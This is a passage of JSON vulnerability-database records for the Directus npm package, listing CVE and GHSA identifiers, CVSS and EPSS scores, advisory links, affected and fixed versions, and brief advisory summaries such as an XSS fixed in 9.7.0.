:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T16:23:35Z/"}],"url":"https://github.com/directus/directus
/security/advisories/GHSA-8m32-p958-jg99"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35408","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35408"},{"reference_url":"https://github.com/advisories/GHSA-8m32-p958-jg99","reference_id":"GHSA-8m32-p958-jg99","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8m32-p958-jg99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35408","GHSA-8m32-p958-jg99"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mp82-hx9n-dufy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/265251?format=json","vulnerability_id":"VCID-msb5-197k-a3er","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46990","reference_id":"","reference_type":"","scores":[{"value":"0.00237","scoring_system":"epss","scoring_elements":"0.46944","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46990"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}
],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b"},{"reference_url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52"},{"reference_url":"https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"
value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff"},{"reference_url":"https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46990","reference_id":"CVE-2024-46990","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46990"},{"reference_url":"https://github.com/advisories/GHSA-68g8-c275-xf2m","reference_id":"GHSA-68g8-c275-xf2m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-68g8-c275-xf2m"},{"reference_url":"ht
tps://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m","reference_id":"GHSA-68g8-c275-xf2m","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82736?format=json","purl":"pkg:npm/directus@10.13.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3"},{"url":"http://public2.vulnerablecode.io/api/packages/82737?format=json","purl":"pkg:npm/directus@11.0.0-rc.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vu
lnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.0.0-rc.1"},{"url":"http://public2.vulnerablecode.io/api/packages/82738?format=json","purl":"pkg:npm/directus@11.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-bjzg-mzjf-cfau"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-w1ph-v2n1-nbby"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xtcw-1jv1-s7a
x"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0"}],"aliases":["CVE-2024-46990","GHSA-68g8-c275-xf2m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-msb5-197k-a3er"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20779?format=json","vulnerability_id":"VCID-na3v-me78-aqcg","summary":"Directus Vulnerable to Information Leakage in Existing Collections\nAn observable difference in error messaging was found in the Directus REST API. The `/items/{collection}` API returns different error messages for these two cases:\n1. A user tries to access an existing collection which they are not authorized to access.\n2. A user tries to access a non-existing collection.\n\nThe two differing error messages leak the existence of collections to users who are not authorized to access these collections.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64749","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14466","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64749"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":
"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/"}],"url":"https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64749","reference_id":"CVE-2025-64749","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64749"},{"reference_url":"https://github.com/advisories/GHSA-cph6-524f-3hgr","reference_id":"GHSA-cph6-524f-3hgr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cph6-524f-3hgr"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr","reference_id":"GHSA-cph6-524f-3hgr","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70180?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vu
lnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64749","GHSA-cph6-524f-3hgr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-na3v-me78-aqcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20770?format=json","vulnerability_id":"VCID-nvha-b5tb-dqdt","summary":"Directus's conceal fields are searchable if read permissions enabled\nA vulnerability allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64748","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13839","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64748"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/
2025-11-13T21:39:19Z/"}],"url":"https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64748","reference_id":"CVE-2025-64748","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64748"},{"reference_url":"https://github.com/advisories/GHSA-8jpw-gpr4-8cmh","reference_id":"GHSA-8jpw-gpr4-8cmh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8jpw-gpr4-8cmh"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh","reference_id":"GHSA-8jpw-gpr4-8cmh","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70180?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukz
v-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64748","GHSA-8jpw-gpr4-8cmh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nvha-b5tb-dqdt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330169?format=json","vulnerability_id":"VCID-p1m5-v3rs-wbh7","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35409","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02855","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35409"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:04:19Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35409","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"valu
e":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35409"},{"reference_url":"https://github.com/advisories/GHSA-wv3h-5fx7-966h","reference_id":"GHSA-wv3h-5fx7-966h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wv3h-5fx7-966h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188565?format=json","purl":"pkg:npm/directus@11.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.0"}],"aliases":["CVE-2026-35409","GHSA-wv3h-5fx7-966h"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p1m5-v3rs-wbh7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15449?format=json","vulnerability_id":"VCID-p7d9-91j7-dbab","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nDirectus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.7.0, unauthorized JavaScript (JS) can be executed by inserting an iframe into the rich text html interface that links to an uploaded HTML file that loads another uploaded JS file in its script tag. This satisfies the regular content security policy header, which in turn allows the file to run any arbitrary JS. This issue was resolved in version 9.7.0. 
As a workaround, disable the live embed in the what-you-see-is-what-you-get (WYSIWYG) editor by adding `{ \"media_live_embeds\": false }` to the _Options Overrides_ option of the Rich Text HTML interface.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-24814","reference_id":"","reference_type":"","scores":[{"value":"0.0043","scoring_system":"epss","scoring_elements":"0.62814","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-24814"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/pull/12020","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/pull/12020"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.7.0","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.7.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24814","reference_id":"CVE-2022-24814","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVS
S:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24814"},{"reference_url":"https://github.com/advisories/GHSA-xmjj-3c76-5w84","reference_id":"GHSA-xmjj-3c76-5w84","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xmjj-3c76-5w84"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84","reference_id":"GHSA-xmjj-3c76-5w84","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60235?format=json","purl":"pkg:npm/directus@9.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-9gba-zszk-p3h6"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-et4m-8y15-9fb9"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"
